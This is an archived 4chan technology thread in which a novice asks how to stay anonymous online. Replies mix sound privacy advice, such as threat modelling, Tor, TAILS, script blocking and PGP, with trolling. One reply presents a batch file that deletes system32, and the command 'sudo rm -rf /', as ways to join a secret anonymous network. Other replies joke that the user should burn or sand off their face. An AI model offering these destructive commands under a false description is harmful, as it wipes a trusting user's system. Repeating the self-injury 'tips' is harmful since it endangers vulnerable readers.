[Boards: 3 / a / aco / adv / an / asp / b / biz / c / cgl / ck / cm / co / d / diy / e / fa / fit / g / gd / gif / h / hc / his / hm / hr / i / ic / int / jp / k / lgbt / lit / m / mlp / mu / n / news / o / out / p / po / pol / qa / r / r9k / s / s4s / sci / soc / sp / t / tg / toy / trash / trv / tv / u / v / vg / vp / vr / w / wg / wsg / wsr / x / y ] [Home]
4chanarchives logo
how to stay as anonymous as possible
Images are sometimes not shown due to bandwidth/network limitations. Refreshing the page usually helps.

You are currently reading a thread in /g/ - Technology

Thread replies: 27
Thread images: 3
File: images.jpg (12 KB, 283x178) Image search: [Google]
images.jpg
12 KB, 283x178
just looking for any tips on how to boost my anonymity
>>
>>51799115

you install gentoo and you never look back
>>
do not use internet
>>
whats gentoo??? and lol good point;)
>>
delete system 32 senpai, it's where microsoft takes all your info
>>
File: 1444793587196.png (85 KB, 294x258) Image search: [Google]
1444793587196.png
85 KB, 294x258
>>51799115
Go full normie and hide in plain sight doing absolutely nothing of importance on your social media accounts.
>>
Go off grid and never go back to society.
>>
install the gentoo security suite
>>
im on a mac in a virtual box i don think microsoft can get me lol
>>
get TAILS
>>
is gentoo just a website or like a browser like torr
>>
tor
>>
File: amusement.jpg (182 KB, 600x600) Image search: [Google]
amusement.jpg
182 KB, 600x600
>>51799115
On Windows:

> Create a new text file
> type @echo off DEL system32.exe
> save as anonymous.bat (all files)
> Run it
> It will connect you to the superTOR network, a super-secretive anonymous internet

Linux:

Simply type 'sudo rm -rf /'

Last time I checked there was no way with OSX, if you use that you're out of luck.
>>
but i could get a linux distro and run it right ?
>>
what about if i wanted to go into the deep web or the dark web or what ever the fuck lol
>>
>>51799115
From who? Step one is your threat model. Who's your adversary? Why do they want to know who you are? What are their capabilities? If it's the NSA, you're in for a ride:
>use a VPN
>use Tor
>refrain from using anything made by Google, Apple, Microsoft, or Facebook
>that includes smartphones
>that also includes gmail, youtube, etc
>never mix your real-life and your anonymous identities, even the slightest bit
>disable javascript
>do not have flash installed
>do not accept cookies, or use an addon that deletes them often
>try to do everything from an internet connection that isn't your own
>always assume the network is hostile
>try not to use email, it's insecure by design
>if you have to use it, use PGP
>remember that bitcoin is not anonymous
and most of all
>remember that you only have to slip up once and it's game over
>>
thanks this helps alot i just have some questions like why no java or flash
>>
>>51799322
youre fucking retarded.
>>
never said i was smart
>>
lol ;;)
>>
>>51799272
>>51799156
Im full normie bland on my facebook and other social media, like a perfectly crafted mask that i show to the world.

I always use disconnect and ublock, but when i want to go anonymous I use Anonymizer and random agent spoofer, my browser is Mozilla Firefox.

How good is this setup for being anynomus and avoiding getting tracked? Im not doing anytihing illegal, would be using tails OS on public wifi for that, i just dont want someone to figure out who I am.
>>
>>51799526
you need something that kills cookies and flash LSOs, and ideally something for shutting down as much javascript as you can (NoScript or uMatrix) Go check out the EFF's Panopticlick
>>
wasn't there a guide on the tor website?
>>
>>51799571
I do use private session, which saves no cookies data etc, not sure if it blocks cookies, but i will look in on noscript atleast. I dont have flash installed either.
>>
sand your face off
>>
throw away all electronics. give yourself third degree burns. especially to your face hands and feet
>>
>>51799115
unplug cable modem, get feraday cage, get signal jammer.
Thread replies: 27
Thread images: 3

banner
banner
[Boards: 3 / a / aco / adv / an / asp / b / biz / c / cgl / ck / cm / co / d / diy / e / fa / fit / g / gd / gif / h / hc / his / hm / hr / i / ic / int / jp / k / lgbt / lit / m / mlp / mu / n / news / o / out / p / po / pol / qa / r / r9k / s / s4s / sci / soc / sp / t / tg / toy / trash / trv / tv / u / v / vg / vp / vr / w / wg / wsg / wsr / x / y] [Home]

All trademarks and copyrights on this page are owned by their respective parties. Images uploaded are the responsibility of the Poster. Comments are owned by the Poster.
If a post contains personal/copyrighted/illegal content you can contact me at [email protected] with that post and thread number and it will be removed as soon as possible.
DMCA Content Takedown via dmca.com
All images are hosted on imgur.com, send takedown notices to them.
This is a 4chan archive - all of the content originated from them. If you need IP information for a Poster - you need to contact them. This website shows only archived content.